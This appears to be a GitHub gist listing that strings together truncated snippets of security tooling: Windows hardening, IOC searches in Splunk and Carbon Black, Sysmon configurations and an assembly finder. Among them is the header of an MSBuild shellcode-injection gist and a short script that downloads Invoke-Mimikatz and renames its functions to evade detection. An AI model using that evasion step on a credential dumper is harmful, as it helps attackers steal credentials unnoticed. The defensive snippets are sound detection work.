@ion-storm
ion-storm / windows_hardening.cmd
Created November 4, 2018 02:26 — forked from mackwage/windows_hardening.cmd
Script to perform some hardening of Windows OS
::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
@irctrakz
irctrakz / IOC Splunker
Created February 8, 2013 23:18
Script to parse openIOC format files and search Splunk for extracted IP addresses.
#! /usr/bin/perl
#
# Script written to pull IP data from openIOC and search Splunk.
#
use strict;
use warnings;
$|=1;
@vector-sec
vector-sec / gist:9caa8e14b2adba7ab0c215a6bf856953
Created November 28, 2017 15:09
Carbon Black API - PowerShell Example - Find All FileMods By certutil.exe - Type 1 == PE Write.
$APIKey = 'KEY'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = "https://www.example.com/api/v1/process?q=process_name:certutil.exe"
$hdrs = @{}
$hdrs.Add("X-Auth-Token",$APIKey)
$response = Invoke-RestMethod -Uri $url -Headers $hdrs
for($i =0; $i -lt $response.total_results; $i++)
{
@vector-sec
vector-sec / msbuildQueueAPC.csproj
Created August 30, 2017 13:11
MSBuild => CSC.exe Shellcode Inject using QueueUserAPC
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- x86 -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<!-- x64 -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@keithmccammon
keithmccammon / iocs_to_definition.py
Last active March 7, 2021 16:34
Make a Surveyor definition given a file full of indicators, one per line. Warning: This is a hack and performs no grouping. It's just a really fast means of asking Cb Response "where do these things appear?"
#!/usr/bin/env python
"""
To use me:
1) Make a file full of indicators, one per line, call it indicators.txt.
NOTE: This was written to handle IP addresses. Change line 40 from ipaddr to md5 if passing hashes.
2) python iocs_to_definition.py indicators.txt
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
# Uncomment below two lines to clean comments from all .ps1 files in ./
#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \;
#find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \;
sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1
sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1
sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1
@mgraeber-rc
mgraeber-rc / log_nothing.xml
Created March 16, 2021 14:43
A sysmon configuration that defaults to logging nothing. I use this as a baseline configuration for testing purposes where I can selectively turn on log sources by changing "include" to "exclude"
<Sysmon schemaversion="4.50">
<HashAlgorithms>md5,sha256</HashAlgorithms>
<EventFiltering>
<!--Event ID 1: Process creation-->
<ProcessCreate onmatch="include"></ProcessCreate>
<!--Event ID 2: A process changed a file creation time-->
<FileCreateTime onmatch="include"></FileCreateTime>
<!--Event ID 3: Network connection-->
<NetworkConnect onmatch="include"></NetworkConnect>
<!--Event ID 5: Process terminated-->
@oukeu
oukeu / GrantedAccess.spl
Last active October 29, 2021 13:13
Enumerate the human-readable permissions listed in Sysmon EID 10s.
```
Author: @0x1FFFFF
Date: 1 September, 2021
Goal: Enumerate the human-readable permissions listed in Sysmon EID 10s.
Note: This type of logic is too heavy to run inline in a search. Use this to generate results and add to a lookup table.
```
$Your_Sysmon_Logic_Here$ EventCode=10
| stats count by GrantedAccess
@MHaggis
MHaggis / Find-Assemblies.ps1
Created February 14, 2020 04:51 — forked from TheWover/Find-Assemblies.ps1
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
Param([parameter(Mandatory=$true,
HelpMessage="Directory to search for .NET Assemblies in.")]
$Directory,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to search recursively.")]
[switch]$Recurse = $false,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to include DLLs in the search.")]
[switch]$DLLs = $false,
[parameter(Mandatory=$false,
<Sysmon schemaversion="4.32">
<!-- Capture all hashes -->
<HashAlgorithms>*</HashAlgorithms>
<DnsLookup>False</DnsLookup>
<ArchiveDirectory>Archive</ArchiveDirectory>
<EventFiltering>
<RuleGroup name="" groupRelation="or">
<!-- Event ID 1 == Process Creation. Log all newly created processes except -->
<ProcessCreate onmatch="exclude">
<Image condition="contains">splunk</Image>